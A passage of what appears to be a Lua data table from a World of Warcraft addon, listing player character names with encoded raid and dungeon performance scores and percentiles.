["Nightfallen"] = "LT:667/98%LB:655/97%LM:943/97%",
["Soylief"] = "ET:692/90%RB:544/73%EM:743/78%",
["Kabraken"] = "RT:189/67%UB:297/37%RM:473/55%",
["Omght"] = "ET:557/76%EB:653/84%LM:934/95%",
["Hoary"] = "ET:383/92%EB:746/94%EM:918/92%",
["Jackstyles"] = "ET:736/94%EB:668/86%EM:828/87%",
["Zerduin"] = "ET:442/94%AB:100/100%LM:760/95%",
["Frostrain"] = "UT:214/28%UB:228/31%UM:333/35%",
["Nonamekm"] = "LT:463/96%LB:741/95%LM:920/97%",
["Mythrain"] = "ET:335/89%EB:530/93%EM:866/93%",
["Brighamyöung"] = "LT:447/95%EB:670/84%EM:598/88%",
["Baqkhami"] = "ET:383/92%LB:751/95%EM:912/93%",
["Foodpandy"] = "RT:184/65%EB:647/84%EM:849/89%",
["Whommp"] = "LT:758/98%LB:779/98%SM:1003/99%",
["Bigkanga"] = "ET:585/80%EB:679/87%RM:498/56%",
["Roguedad"] = "ET:317/86%EB:600/93%EM:854/89%",
["Ageor"] = "ET:578/76%EB:603/78%EM:467/80%",
["Shinlee"] = "ET:504/77%RB:260/68%RM:656/60%",
["Nösföratu"] = "ET:718/92%LB:780/98%EM:862/93%",
["Seplin"] = "RT:530/71%RB:448/65%RM:260/61%",
["Resisted"] = "RT:532/72%LB:777/97%LM:976/98%",
["Hoyz"] = "LT:627/98%EB:559/94%EM:523/86%",
["Courtel"] = "LT:562/97%EB:573/92%LM:932/95%",
["Betachief"] = "LT:552/97%LB:596/95%LM:917/97%",
["Clopen"] = "ET:619/81%EB:660/85%EM:703/75%",
["Betterannie"] = "UT:287/38%RB:461/61%EM:733/79%",
["Techlead"] = "LT:471/96%EB:687/88%RM:690/73%",
["Acris"] = "RT:398/52%EB:505/87%EM:772/81%",
["Tharage"] = "RT:219/73%EB:501/88%RM:298/65%",
["Peteleetzor"] = "ET:444/94%EB:564/92%EM:494/82%",
["Warriorke"] = "RT:228/74%EB:600/78%EM:831/88%",
["Visvim"] = "ET:299/83%LB:762/96%EM:909/93%",
["Tanzhilang"] = "ET:687/92%EB:626/87%EM:775/88%",
["Cannonballz"] = "LT:624/98%EB:562/82%RM:445/72%",
["Xanwarp"] = "ST:706/99%LB:674/96%EM:547/85%",
["Rvten"] = "RT:426/58%EB:653/84%EM:727/76%",
["Sicle"] = "LB:757/95%EM:711/78%",
["Swagkat"] = "EB:724/92%EM:858/88%",
["Taxcollector"] = "ET:325/88%EB:572/92%EM:872/90%",
["Bobbyshazam"] = "ET:444/94%LB:747/96%EM:707/81%",
["Jizzgrenade"] = "ET:722/93%LB:630/97%LM:963/98%",
["Jookyzz"] = "RB:488/66%RM:678/73%",
["Uncritabull"] = "ST:687/99%SB:725/99%SM:899/99%",
["Evilbaby"] = "RT:458/61%EB:525/89%EM:864/89%",
["Psyrax"] = "ET:311/85%EB:457/83%EM:836/86%",
["Klammy"] = "LT:593/98%EB:738/94%LM:755/96%",
["Ezblue"] = "UT:309/42%EB:394/78%EM:911/93%",
["Papacoomer"] = "EB:646/82%RM:485/69%",
["Zergman"] = "RB:470/63%RM:518/55%",
["Scrublet"] = "ET:251/79%EB:581/92%EM:873/90%",
["Bli"] = "ET:682/91%LB:774/98%LM:957/98%",
["Tighermoth"] = "RT:461/73%LB:757/96%LM:972/98%",
["Moonlovers"] = "ET:616/81%LB:704/97%EM:635/89%",
["Bigbonned"] = "ET:266/81%RB:552/73%EM:720/76%",
["Digz"] = "ET:343/89%EB:678/92%EM:876/94%",
["Travino"] = "ST:684/99%LB:653/96%LM:934/95%",
["Uwantdindins"] = "UT:127/48%EB:600/79%EM:718/76%",
["Blaqkish"] = "EB:483/86%EM:656/91%",
["Twcrazycow"] = "ET:330/89%EB:514/75%EM:427/76%",
["Paynefull"] = "RB:479/65%RM:375/70%",
["Azhdar"] = "ET:351/90%LB:731/95%LM:704/95%",
["Escapé"] = "ET:585/78%EB:683/88%EM:531/84%",
["Calenciana"] = "ET:622/83%EB:704/90%EM:535/84%",
["Elumnite"] = "RT:510/70%RB:520/69%RM:309/66%",
["Birdwatcher"] = "EB:407/79%EM:859/88%",
["Chloey"] = "ET:403/92%LB:775/97%EM:819/85%",
["Sugashane"] = "RT:381/52%EB:523/89%EM:825/86%",
["Asperbund"] = "LT:537/98%EB:728/94%LM:730/97%",
["Mithra"] = "RT:330/57%EB:623/87%EM:743/88%",
["Brodek"] = "CT:17/3%UB:361/47%UM:340/35%",
["Pugss"] = "RT:408/54%RB:416/60%UM:247/30%",
["Fappuccinoo"] = "ET:358/91%EB:602/83%",
["Taraval"] = "ET:517/75%EB:366/80%RM:615/68%",
["Presta"] = "RT:540/72%EB:691/92%RM:472/55%",
["Bassick"] = "EB:608/80%EM:809/86%",
["Shadowfoxxs"] = "CB:29/3%RM:237/63%",
["Smellybadman"] = "CT:37/14%RB:342/72%EM:796/83%",
["Boomtim"] = "RB:387/69%EM:706/86%",
["Galzareth"] = "CT:86/8%EB:441/75%EM:560/75%",
["Xolmareth"] = "RB:448/60%UM:240/28%",
["Shield"] = "ET:608/86%LB:766/97%LM:967/98%",
["Cipherr"] = "ET:274/83%EB:434/81%EM:762/80%",
["Rusteezy"] = "ET:348/88%EB:709/90%EM:802/83%",
["Douggy"] = "ET:382/91%EB:597/93%LM:928/95%",
["Zarekk"] = "ST:767/99%LB:766/97%LM:962/98%",
["Bossmave"] = "ET:644/85%EB:546/76%UM:146/47%",
["Rodrigo"] = "ST:751/99%LB:723/98%LM:909/98%",
["Noface"] = "ET:352/90%EB:666/86%EM:805/84%",
["Olddirtymage"] = "LT:459/96%SB:701/99%LM:760/96%",
["Wahkeen"] = "ET:730/93%EB:711/90%EM:757/79%",
["Nograx"] = "RT:444/58%EB:440/82%EM:585/85%",
["Kesulos"] = "ET:369/91%EB:574/76%EM:785/82%",
["Drizzhu"] = "ET:631/92%LB:746/96%EM:626/76%",
["Qraven"] = "ET:636/84%LB:763/96%LM:960/96%",
["Yyq"] = "ET:609/81%EB:683/88%EM:829/87%",
["Soulripper"] = "ET:267/82%UB:314/40%RM:246/64%",
["Harata"] = "ET:279/83%EB:460/84%EM:450/80%",
["Ghostsniper"] = "RT:161/58%EB:476/90%UM:379/48%",
["Wenku"] = "ET:597/79%EB:418/79%EM:485/81%",
["Jelyta"] = "UT:130/48%UB:258/35%RM:275/68%",
["Týrr"] = "ET:606/86%LB:746/95%LM:885/95%",
["Sihyun"] = "ET:287/85%EB:506/88%EM:774/81%",
["Ikett"] = "UT:289/38%EB:647/84%EM:793/85%",
["Pexel"] = "ET:710/91%EB:628/82%EM:881/91%",
["Amberlee"] = "UT:318/41%RB:521/69%EM:844/89%",
["Wobuzhidao"] = "ET:620/82%EB:531/90%EM:776/81%",
["Phobya"] = "ET:461/94%EB:682/87%RM:295/64%",
["Khazdin"] = "ET:348/91%LB:772/97%EM:925/94%",
["Ahso"] = "ET:618/81%EB:637/83%RM:625/65%",
["Cynaster"] = "RT:421/68%EB:710/93%EM:859/92%",
["Blueoire"] = "ET:681/89%EB:731/93%EM:883/92%",
["Hüntard"] = "ET:330/88%LB:690/97%LM:826/97%",
["Biopain"] = "LT:645/98%LB:754/95%LM:944/96%",
["Qwerqwer"] = "LT:466/95%LB:771/97%EM:907/92%",
["Blastmage"] = "UT:376/49%RB:241/58%EM:656/78%",
["Velorin"] = "ET:707/91%EB:710/90%EM:893/92%",
["Raczac"] = "ET:662/86%EB:710/90%EM:907/94%",
["Timberwolf"] = "LT:587/97%EB:697/89%LM:770/95%",
["Mkii"] = "ET:591/79%EB:571/75%EM:752/79%",
["Dabkingz"] = "RT:487/65%RB:315/70%RM:216/60%",
["Reminosc"] = "LT:759/97%LB:780/98%LM:744/97%",
["Polychrome"] = "ET:282/80%EB:611/94%LM:853/97%",
["Calina"] = "ET:619/82%EB:740/93%EM:898/92%",
["Cleavesteamr"] = "ET:308/87%RB:507/67%EM:768/81%",
["Locksoflove"] = "ET:264/78%RB:350/71%RM:603/62%",
["Klng"] = "LT:483/96%EB:709/90%EM:889/91%",
["Otaiwinx"] = "CT:28/1%EB:485/90%RM:564/66%",
["Angrycuban"] = "ET:651/85%EB:638/82%LM:926/95%",
["Rikrude"] = "ST:766/99%LB:697/97%EM:833/86%",
["Tariel"] = "ET:608/81%EB:721/92%EM:863/89%",
["Walkinglive"] = "ET:635/83%EB:607/80%RM:595/64%",
["Jojoko"] = "RT:174/62%EB:401/78%EM:639/90%",
["Keety"] = "ST:717/99%SB:729/99%LM:965/98%",
["Bandaidz"] = "LT:757/98%SB:826/99%SM:1004/99%",
["Tobah"] = "ET:370/91%EB:689/89%EM:886/92%",
["Dougnome"] = "RT:231/74%EB:649/85%RM:546/64%",
["Shinylipz"] = "ET:678/92%SB:682/99%LM:954/98%",
["Twodollar"] = "ET:708/93%LB:736/95%EM:679/83%",
["Coldheart"] = "ET:293/83%EB:470/84%RM:295/61%",
["Zordamage"] = "ET:565/76%EB:536/89%EM:783/84%",
["Lightsith"] = "RT:538/72%EB:653/84%EM:817/85%",
["Cley"] = "ST:735/99%LB:716/98%LM:833/98%",
["Sangege"] = "LT:731/95%LB:707/98%EM:763/88%",
["Sertan"] = "ET:732/94%EB:649/84%EM:733/78%",
["Stupid"] = "LT:554/97%SB:718/99%LM:961/98%",
["Aartlay"] = "ET:606/80%EB:530/89%EM:711/76%",
["Wulfgår"] = "LT:588/98%LB:762/97%LM:939/97%",
["Cyberfiend"] = "LT:770/98%LB:766/98%LM:914/97%",
["Yefayam"] = "RB:461/60%UM:449/47%",
["Kbbq"] = "EB:627/86%EM:782/84%",
["Bibibaba"] = "RT:331/56%EB:447/83%EM:831/86%",
["Hemorrhaging"] = "EB:673/85%EM:883/90%",
["Roong"] = "RT:419/54%EB:596/76%RM:640/68%",
["Rïp"] = "ET:337/88%EB:725/92%EM:886/92%",
["Flutterby"] = "RB:461/60%RM:613/69%",
["Pibby"] = "EB:427/81%EM:818/85%",
["Wdnmddz"] = "CT:187/24%EB:724/91%EM:885/90%",
["Tearnv"] = "UB:325/42%UM:239/28%",
["Drcptsxypnts"] = "LB:646/96%LM:956/97%",
["Shoom"] = "ET:248/75%EB:698/89%EM:813/86%",
["Kohsik"] = "EB:688/87%RM:447/51%",
["Beamerina"] = "UT:85/31%EB:730/92%EM:862/88%",
["Choonen"] = "RB:396/53%RM:567/61%",
["Madaoo"] = "ET:673/87%RB:562/74%RM:659/62%",
["Warrmachine"] = "LT:509/97%LB:754/96%LM:913/96%",
["Toonworld"] = "CT:32/13%RB:565/72%EM:771/81%",
["Shujinko"] = "ET:310/87%EB:494/87%EM:767/83%",
["Hunnted"] = "LB:777/97%LM:965/97%",
["Beåmer"] = "ET:399/92%LB:664/96%EM:924/94%",
["Thebbq"] = "ST:689/99%LB:626/96%LM:632/95%",
["Malthidan"] = "ET:639/93%SB:805/99%LM:915/97%",
["Dáed"] = "EB:615/80%RM:257/56%",
["Buffbenis"] = "CT:47/19%RB:552/73%EM:408/75%",
["Lubo"] = "CT:79/14%RB:524/69%UM:417/47%",
["Squinchy"] = "EB:607/77%RM:381/73%",
["Tarmaz"] = "ET:726/94%LB:748/95%LM:960/98%",
["Fulminator"] = "ET:636/87%EB:709/93%EM:879/91%",
["Shiinaringo"] = "RB:347/71%RM:652/69%",
["Ukininam"] = "RT:240/73%EB:729/92%LM:799/96%",
["Muta"] = "RT:379/52%RB:558/73%EM:691/92%",
["Pollenie"] = "LT:488/95%EB:702/89%LM:762/95%",
["Quesoblanco"] = "ET:580/76%LB:644/95%EM:804/83%",
["Imoto"] = "UT:303/39%RB:543/72%RM:438/50%",
["Awesomebbg"] = "EB:741/93%EM:764/80%",
["Cêdis"] = "RB:312/66%RM:469/50%",
["Narko"] = "RB:442/58%RM:352/70%",
["Kevîn"] = "EB:711/89%EM:925/94%",
["Brockgames"] = "ET:704/91%LB:756/95%LM:923/95%",
["Snyt"] = "RT:164/59%EB:671/87%EM:820/87%",
["Honomu"] = "CB:36/3%UM:184/49%",
["Texong"] = "EB:655/85%EM:740/80%",
["Tanasty"] = "ET:612/81%EB:716/94%EM:808/89%",
["Ericpaschall"] = "EB:623/81%EM:748/78%",
["Bádmage"] = "RT:110/68%RB:266/62%RM:284/66%",
["Shrimptea"] = "LB:757/95%EM:815/86%",
["Satyrs"] = "ET:318/85%LB:782/98%EM:914/93%",
["Tripped"] = "ET:261/81%EB:651/90%EM:826/91%",
["Noba"] = "RT:112/50%EB:535/93%EM:833/91%",
["Etimos"] = "EB:499/86%RM:334/68%",
["Xenna"] = "RT:382/50%EB:633/82%EM:768/80%",
["Pheebee"] = "EB:656/85%RM:543/60%",
["Deathcoilz"] = "RT:462/61%EB:598/79%EM:785/84%",
["Akheena"] = "ET:735/94%EB:743/94%RM:661/63%",
["Ryth"] = "LT:619/98%EB:610/94%EM:890/88%",
["Snootbooper"] = "ET:631/84%EB:732/92%RM:654/70%",
["Portfactory"] = "CT:143/18%RB:421/58%EM:335/75%",
["Wrecksare"] = "ET:647/85%EB:681/88%EM:719/93%",
["Hashimoto"] = "RT:529/71%RB:369/74%EM:522/83%",
["Chalupataco"] = "UT:335/47%RB:403/52%RM:633/71%",
["Tdlichn"] = "UT:133/49%RB:264/62%RM:308/67%",
["Hulaka"] = "ET:610/81%EB:591/77%RM:448/51%",
["Mmunsterr"] = "ET:606/80%EB:716/91%EM:890/91%",
["Bustahlol"] = "ET:647/85%LB:664/96%EM:858/86%",
["Obispo"] = "ET:680/88%EB:473/85%RM:598/67%",
["Fròstitute"] = "ET:379/92%EB:351/76%UM:367/48%",
["Prolific"] = "RT:147/52%EB:579/76%EM:466/77%",
["Tånk"] = "ET:725/94%LB:642/97%EM:500/90%",
["Vehemence"] = "ST:766/99%SB:727/99%SM:1001/99%",
["Waifuwu"] = "ET:625/94%LB:602/96%SM:1010/99%",
["Felaxe"] = "RT:495/67%RB:503/64%EM:850/83%",
["Angelmage"] = "ET:352/93%EB:537/75%RM:220/60%",
["Beeny"] = "ET:598/85%EB:503/91%EM:750/87%",
["Luunna"] = "ET:648/85%EB:744/94%EM:880/91%",
["Kryy"] = "ET:402/94%LB:650/97%SM:926/99%",
["Cityhunter"] = "ET:668/87%EB:682/88%EM:856/88%",
["Ector"] = "ET:624/83%EB:717/91%EM:513/84%",
["Chaox"] = "ET:633/83%EB:715/94%EM:829/91%",
["Dawnsky"] = "ET:621/82%EB:487/86%EM:817/87%",
["Thebound"] = "RT:499/66%EB:614/80%EM:531/82%",
["Ramenoodles"] = "LT:542/97%EB:585/93%EM:815/86%",
["Möshbrah"] = "ET:333/87%EB:707/90%EM:890/91%",
["Schrei"] = "ET:715/92%LB:643/96%EM:921/94%",
["Ozzyjewls"] = "ET:618/81%EB:576/76%EM:448/78%",
["Wildlentil"] = "CT:140/22%UB:383/49%CM:244/24%",
["Facebiter"] = "LT:456/96%EB:559/91%EM:623/89%",
["Rroy"] = "ET:569/75%EB:683/87%LM:938/95%",
["Butterbreath"] = "ET:608/81%EB:714/91%EM:777/81%",
["Olddude"] = "ET:339/87%EB:571/76%EM:795/82%",
["Youjumpijump"] = "ET:421/94%EB:693/88%EM:909/93%",
["Mathtutor"] = "ET:395/93%EB:593/78%EM:739/80%",
["Skizzikk"] = "LT:503/96%EB:564/91%EM:739/78%",
["Owwo"] = "ET:662/87%EB:619/80%LM:946/96%",
["Blackwaltzz"] = "UT:355/49%EB:647/83%EM:813/87%",
["Luckycharms"] = "ET:700/93%EB:734/94%LM:919/95%",
["Pekoeta"] = "UT:372/48%EB:630/83%LM:950/96%",
["Icyoppai"] = "RT:146/54%LB:765/96%LM:985/98%",
["Grish"] = "ET:629/83%LB:630/95%LM:960/97%",
["Jayss"] = "ET:625/83%LB:783/98%LM:971/98%",
["Panik"] = "ET:275/79%EB:581/92%RM:377/72%",
["Bigredpetinc"] = "ET:304/86%EB:592/93%EM:653/91%",
["Moò"] = "RT:141/53%EB:725/91%EM:806/84%",
["Puppydogkiss"] = "UT:113/44%UB:382/49%RM:500/57%",
["Antishock"] = "ET:485/89%SB:769/99%LM:855/95%",
["Yym"] = "ET:642/85%EB:663/86%EM:854/88%",
["Randomizet"] = "ET:615/80%EB:701/89%EM:894/92%",
["Aurellias"] = "LT:769/98%SB:753/99%LM:820/98%",
["Drakesean"] = "ET:280/80%EB:583/77%RM:610/66%",
["Goruka"] = "ST:764/99%LB:711/98%LM:955/97%",
["Tubaiste"] = "LT:483/95%EB:599/93%RM:367/71%",
["Darkwel"] = "ET:252/83%EB:589/89%EM:818/92%",
["Similac"] = "ET:557/81%EB:679/85%EM:549/79%",
["Cyyoung"] = "ET:307/84%LB:712/98%EM:865/89%",
["Whalefall"] = "ET:588/77%EB:651/84%EM:699/75%",
["Brohly"] = "ET:412/94%EB:522/89%EM:813/87%",
["Coppafeel"] = "UT:122/44%RB:542/69%EM:849/83%",
["Pulisic"] = "ET:330/88%EB:556/91%EM:718/76%",
["Zenith"] = "UT:270/49%RB:450/59%RM:475/74%",
["Remwarr"] = "ET:634/83%EB:610/94%EM:705/77%",
["Thandi"] = "ET:658/90%LB:773/98%LM:758/97%",
["Docthetank"] = "RB:469/62%RM:596/67%",
["Dalamiya"] = "ET:358/90%EB:674/86%EM:781/81%",
["Biglittle"] = "RB:507/68%UM:264/31%",
["Smush"] = "RB:542/69%UM:373/43%",
["Knivez"] = "CT:52/21%RB:564/72%EM:804/84%",
["Tlttyboytay"] = "RT:399/55%RB:463/61%CM:101/12%",
["Patate"] = "RT:476/63%EB:722/92%EM:816/87%",
["Gnomaphobia"] = "UT:114/41%EB:430/80%EM:717/76%",
["Blackhanded"] = "LT:565/97%LB:674/96%LM:925/95%",
["Koker"] = "SB:799/99%SM:992/99%",
["Abraxis"] = "ET:328/89%EB:626/79%RM:699/74%",
["She"] = "LB:766/96%LM:943/95%",
["Gyasi"] = "LT:692/95%LB:706/98%LM:882/98%",
["Adinex"] = "LT:606/97%EB:722/92%EM:925/94%",
["Sybreed"] = "EB:749/94%EM:925/94%",
["Ocho"] = "CT:39/8%RB:552/70%LM:970/97%",
["Toshiko"] = "LT:552/98%EB:645/82%EM:778/81%",
["Sangwice"] = "EB:714/94%EM:770/86%",
["Lupita"] = "EB:560/79%RM:669/73%",
["Sebasstian"] = "RB:255/63%UM:149/48%",
["Anthonynado"] = "ET:595/79%UB:346/47%UM:373/44%",
["Forth"] = "CB:69/8%UM:367/43%",
["Viserionn"] = "RB:477/67%UM:203/26%",
["Belzenlok"] = "LT:483/95%LB:647/95%EM:913/93%",
["Morningsword"] = "CT:154/24%EB:708/91%EM:748/81%",
["Kalrook"] = "UT:117/45%RB:411/53%RM:535/73%",
["Andrewryan"] = "RB:479/67%EM:655/76%",
["Kirchos"] = "UM:83/32%",
["Arinly"] = "LT:447/95%LB:579/95%LM:906/96%",
["Bonermagic"] = "CT:0/1%UB:221/29%RM:445/52%",
["Coogi"] = "EB:479/89%EM:756/88%",
["Dookmarriot"] = "ET:618/81%EB:700/89%LM:941/97%",
["Zandanken"] = "ET:649/85%EB:674/90%EM:876/94%",
["Tinymango"] = "UB:329/45%EM:438/83%",
["Enlem"] = "ET:261/77%EB:414/79%RM:513/52%",
["Zeitmcongmin"] = "CT:66/23%RB:522/70%RM:546/59%",
["Vissen"] = "CM:23/3%",
["Peppylepew"] = "UT:214/32%RB:499/70%RM:646/71%",
["Darknate"] = "ET:306/84%EB:674/86%EM:748/78%",
["Bígsmoke"] = "ET:296/85%UB:153/40%EM:360/77%",
["Varali"] = "RT:470/61%RB:535/71%EM:458/77%",
["Shewlol"] = "ET:660/86%EB:572/92%EM:749/94%",
["Brave"] = "LT:770/97%LB:698/97%LM:943/95%",
["Pipdegan"] = "ET:269/81%EB:692/92%UM:425/46%",
["Nastybowen"] = "ET:574/78%EB:736/93%EM:913/92%",
["Dromos"] = "ET:239/76%EB:689/89%EM:775/83%",
["Executive"] = "LT:786/98%LB:786/98%LM:976/98%",
["Wesa"] = "RT:227/72%RB:469/63%RM:609/65%",
["Doodoolsia"] = "UT:214/27%RB:472/66%EM:768/82%",
["Huckfinn"] = "ET:333/89%LB:777/97%LM:943/95%",
["Mindysman"] = "LT:623/98%EB:568/91%EM:515/81%",
["Shubnigguraf"] = "RT:541/72%EB:677/87%EM:507/82%",
["Lynntw"] = "RT:539/71%EB:595/76%RM:654/70%",
["Lots"] = "UT:343/45%RB:392/53%EM:465/79%",
["Rolldee"] = "LT:666/98%LB:674/97%LM:935/95%",
["Drshots"] = "UT:124/47%RB:472/62%EM:813/84%",
["Douginator"] = "ET:616/87%EB:702/92%LM:672/96%",
["Soslow"] = "LT:765/96%LB:764/96%EM:913/94%",
["Futurewolf"] = "LT:572/97%LB:651/96%EM:595/88%",
["Moonmew"] = "LT:526/98%LB:718/96%EM:776/90%",
["Slickywoo"] = "UT:330/44%RB:505/66%LM:963/97%",
["Kksuper"] = "ET:727/93%LB:681/97%EM:927/94%",
["Guldô"] = "ET:650/86%EB:713/94%EM:854/94%",
["Dulesavic"] = "ET:332/87%EB:554/91%EM:592/87%",
["Normander"] = "ET:690/89%EB:553/90%EM:814/81%",
["Youngqii"] = "ET:688/89%EB:714/91%EM:691/75%",
["Tripleheich"] = "ET:602/78%EB:634/82%EM:768/81%",
["Gornak"] = "CT:55/20%UM:139/46%",
["Jjxjalalabad"] = "LT:497/96%EB:617/94%EM:784/82%",
["Enivid"] = "RT:533/71%RB:469/68%EM:420/78%",
["Blckwidow"] = "ET:235/81%EB:705/90%EM:909/94%",
["Veldar"] = "ET:676/88%LB:726/98%EM:614/89%",
["Quarantinie"] = "LT:584/97%SB:814/99%LM:951/96%",
["Picklerïck"] = "LT:659/98%EB:659/85%RM:634/68%",
["Brniesanders"] = "ET:633/84%EB:607/80%EM:835/86%",
["Najanaja"] = "ET:597/80%EB:560/91%EM:570/87%",
["Hzoo"] = "LT:768/97%LB:691/97%EM:887/91%",
["Dangol"] = "ET:342/89%EB:605/94%LM:806/96%",
["Hackbuteer"] = "RT:529/72%EB:611/81%RM:678/72%",
["Viskag"] = "ET:697/92%LB:606/96%EM:812/90%",
["Mosbaga"] = "ET:263/78%EB:486/86%RM:684/71%",
["Yodamcfodajr"] = "RT:151/56%EB:705/89%EM:831/86%",
["Spliffmaster"] = "ET:260/80%EB:746/94%EM:830/86%",
["Nyangnyang"] = "ET:703/91%EB:745/94%EM:746/94%",
["Opprimo"] = "LT:439/95%LB:631/97%LM:908/95%",
["Herbsmoke"] = "RT:459/61%CB:189/24%CM:102/9%",
["Iamsorry"] = "ET:691/92%LB:752/96%EM:899/94%",
["Jiroo"] = "RT:432/57%EB:731/92%EM:747/78%",
["Ricki"] = "RT:221/72%EB:594/78%EM:790/84%",
["Tiangua"] = "UT:295/42%RB:304/65%RM:502/57%",
["Sleepyslayer"] = "LT:750/96%LB:759/96%LM:950/97%",
["Jjostar"] = "LT:748/96%EB:533/93%EM:835/93%",
["Emberheart"] = "ET:695/92%LB:644/97%EM:901/94%",
["Elfpanties"] = "ET:425/86%EB:660/93%EM:700/88%",
["Windsmile"] = "LT:769/97%SB:798/99%EM:799/83%",
["Typyy"] = "RT:184/62%EB:583/76%RM:660/68%",
["Wildtank"] = "ET:691/92%EB:625/87%RM:486/69%",
["Aowynn"] = "ET:640/94%LB:658/98%EM:829/93%",
["Nard"] = "EB:610/80%EM:922/92%",
["Killzero"] = "UT:250/36%EB:478/86%EM:695/92%",
["Meldras"] = "ET:373/92%EB:707/92%EM:619/94%",
["Ghostmaker"] = "LT:450/95%RB:552/73%RM:646/69%",
["Funkays"] = "LB:767/96%EM:865/89%",
["Luhkwaith"] = "RT:156/57%EB:386/76%EM:517/83%",
["Righteousx"] = "RT:197/65%EB:588/77%EM:719/77%",
["Spanke"] = "RT:416/55%LB:648/96%EM:895/92%",
["Houndour"] = "EB:642/81%EM:718/76%",
["Whispèr"] = "ET:688/89%EB:674/86%EM:553/84%",
["Touchmë"] = "RB:572/73%RM:372/72%",
["Trewalker"] = "ST:747/99%LB:764/96%LM:959/97%",
["Titlee"] = "EB:744/94%LM:938/96%",
["Berkeley"] = "RT:229/74%EB:607/79%EM:773/81%",
["Sapnntap"] = "RT:207/68%EB:588/75%EM:773/81%",
["Hazzmatics"] = "UT:318/41%EB:713/94%EM:874/91%",
["Cuptron"] = "ET:582/78%EB:660/84%RM:661/73%",
["Nodice"] = "LB:780/97%LM:952/96%",
["Insomaniac"] = "LT:590/98%LB:758/97%LM:977/98%",
["Ciove"] = "RT:504/66%EB:686/88%RM:705/74%",
["Bombaata"] = "ET:326/88%EB:461/84%EM:722/76%",
["Usbport"] = "UT:124/47%LB:774/97%LM:972/98%",
["Braxtøn"] = "LT:520/98%LB:712/95%EM:841/94%",
["Serolux"] = "LT:745/95%LB:765/96%LM:948/97%",
["Silentsteve"] = "UT:72/26%RB:432/55%RM:705/74%",
["Kraetor"] = "ET:633/88%LB:737/95%EM:839/92%",
["Jøsh"] = "UT:133/47%RB:337/70%RM:686/73%",
["Shawnee"] = "RT:490/64%EB:653/84%EM:756/80%",
["Lilwangqt"] = "ET:368/92%EB:665/84%EM:855/88%",
["Beef"] = "LT:558/98%LB:771/97%LM:972/98%",
["Sephris"] = "UT:330/46%EB:608/77%EM:811/85%",
["Salival"] = "UT:345/44%EB:508/87%EM:574/85%",
["Oktober"] = "UB:177/42%RM:609/67%",
["Nitefall"] = "EB:543/90%EM:620/89%",
["Señor"] = "RB:441/58%RM:729/74%",
["Vendimax"] = "EB:642/84%RM:670/73%",
["Bananigans"] = "CT:31/5%EB:595/82%UM:148/48%",
["Ancrath"] = "LT:521/96%LB:642/95%LM:810/96%",
["Glassnipple"] = "RB:443/62%UM:432/47%",
["Linger"] = "CT:0/1%EB:636/87%EM:883/92%",
["Bebens"] = "CT:21/9%RB:287/68%RM:460/54%",
["Royco"] = "EB:435/86%EM:456/84%",
["Yooginong"] = "UB:63/42%EM:528/78%",
["Jadorak"] = "EB:382/81%EM:694/76%",
["Jimbomane"] = "LT:466/95%EB:707/90%LM:942/97%",
["Shleyawk"] = "ET:591/79%EB:723/91%EM:787/82%",
["Huntaarrd"] = "ET:391/93%LB:643/95%EM:870/91%",
["Shihara"] = "ET:372/91%EB:691/88%LM:774/95%",
["Smokes"] = "UT:341/45%RB:402/55%EM:413/77%",
["Nekrømantik"] = "ET:242/76%EB:609/81%EM:405/76%",
["Sanchao"] = "ET:244/77%EB:487/86%RM:655/73%",
["Gabriellaa"] = "RT:513/70%EB:677/87%EM:856/88%",
["Priincesmomo"] = "CT:127/16%UB:373/49%RM:613/71%",
["Ryekar"] = "ET:233/75%EB:380/76%EM:704/77%",
["Cornholyo"] = "ET:291/82%LB:757/95%EM:848/88%",
["Forsakenfate"] = "ET:657/92%LB:672/97%SM:925/99%",
["Dumaduma"] = "RT:549/74%EB:667/86%RM:381/74%",
["Micktool"] = "ET:324/88%LB:649/96%EM:745/94%",
["Ragingfury"] = "ET:714/93%LB:575/95%EM:608/94%",
["Roumo"] = "RT:530/69%EB:684/87%RM:682/73%",
["Puddingvl"] = "ET:419/94%EB:602/80%EM:739/79%",
["Zappin"] = "RT:409/54%UB:339/48%EM:380/75%",
["Ryantroll"] = "RT:505/69%EB:696/89%RM:660/70%",
["Perhapsmear"] = "UT:377/49%UB:273/36%RM:515/56%",
["Everee"] = "ET:634/83%EB:579/80%EM:670/77%",
["Adyss"] = "ET:352/89%EB:637/82%EM:757/79%",
["Teresaa"] = "UT:344/48%EB:647/82%EM:898/92%",
["Bloodsworder"] = "RT:496/67%EB:427/81%RM:665/71%",
["Neveruary"] = "LT:552/97%EB:561/91%EM:395/75%",
["Hackedx"] = "ET:332/88%LB:655/96%EM:709/93%",
["Superkid"] = "LT:700/97%EB:676/94%LM:900/96%",
["Littledottie"] = "RT:522/69%EB:559/91%EM:520/83%",
["Freemark"] = "ET:636/84%EB:615/94%EM:681/92%",
["Archinbone"] = "ET:589/79%EB:621/82%RM:383/74%",
["Dbuubuu"] = "LT:486/96%LB:700/97%EM:875/90%",
["Voomie"] = "ET:247/77%EB:684/88%EM:708/76%",
["Thugslyfe"] = "ET:289/81%EB:681/87%RM:617/64%",
["Popobank"] = "RT:518/70%EB:679/87%EM:772/81%",
["Xiria"] = "UT:128/48%RB:532/71%EM:423/82%",
["Tfunkk"] = "RT:507/69%EB:743/94%EM:921/93%",
["Stormdragon"] = "RT:472/64%EB:434/81%RM:572/64%",
["Shadowbaked"] = "ET:591/78%EB:607/94%EM:487/81%",
["Quiktwo"] = "ET:333/90%LB:615/96%LM:926/96%",
["Hoodraat"] = "ET:424/93%LB:721/98%LM:886/98%",
["Steezy"] = "CT:82/15%UM:84/28%",
["Moobish"] = "RT:434/57%EB:660/85%EM:756/80%",
["Ammoo"] = "ET:583/78%EB:526/89%EM:708/76%",
["Ozwen"] = "UT:325/42%RB:338/70%CM:47/18%",
["Phatbear"] = "LT:415/95%LB:774/98%LM:928/98%",
["Hulkma"] = "ET:243/80%RB:507/74%RM:529/73%",
["Noah"] = "UT:211/27%RB:555/74%EM:766/81%",
["Droe"] = "RB:422/55%RM:767/73%",
["Trueper"] = "EB:703/88%EM:757/79%",
["Rîas"] = "UT:227/29%RB:398/53%CM:68/8%",
["Mastashjake"] = "RB:407/54%CM:85/11%",
["Coopers"] = "EB:701/90%EM:848/87%",
["Gzero"] = "ET:441/94%RB:490/66%EM:498/80%",
["Murderouz"] = "ET:295/84%EB:635/81%EM:850/87%",
["Twoninee"] = "RB:417/54%RM:645/72%",
["Murkuhtor"] = "EB:467/84%EM:825/86%",
["Laibach"] = "LT:748/95%LB:674/96%EM:887/94%",
["Roxxann"] = "ET:586/78%EB:744/94%LM:930/96%",
